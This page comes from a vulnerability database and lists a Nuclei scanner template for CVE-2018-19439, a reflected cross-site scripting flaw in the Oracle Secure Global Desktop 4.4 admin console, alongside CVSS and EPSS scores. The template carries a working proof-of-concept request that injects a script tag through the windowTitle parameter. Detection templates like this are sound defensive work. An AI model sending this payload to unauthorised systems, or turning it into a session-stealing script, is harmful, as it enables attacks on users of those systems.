Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-19439
HistoryJun 22, 2020 - 1:35 p.m.

Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting

2020-06-2213:35:37
ProjectDiscovery
github.com
5

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.003

Percentile

67.9%

Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.

id: CVE-2018-19439

info:
  name: Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting
  author: madrobot,dwisiswant0
  severity: medium
  description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking or unauthorized actions.
  remediation: Fixed in later versions including 5.4.
  reference:
    - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19439
    - http://seclists.org/fulldisclosure/2018/Nov/58
    - https://github.com/sobinge/nuclei-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-19439
    cwe-id: CWE-79
    epss-score: 0.0038
    epss-percentile: 0.72872
    cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: secure_global_desktop
  tags: cve,cve2018,oracle,xss,seclists,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"

    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(1337)</script><!--</TITLE>"
# digest: 4b0a00483046022100b56844229e6ea053b76640548002d26a57799ac1aadafb6ac77fe1d2972d54f4022100a6626f55ef074890ccbffc21b3a56cc95fb44114a0314ae2a1cca4245a7d0956:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.003

Percentile

67.9%

Related for NUCLEI:CVE-2018-19439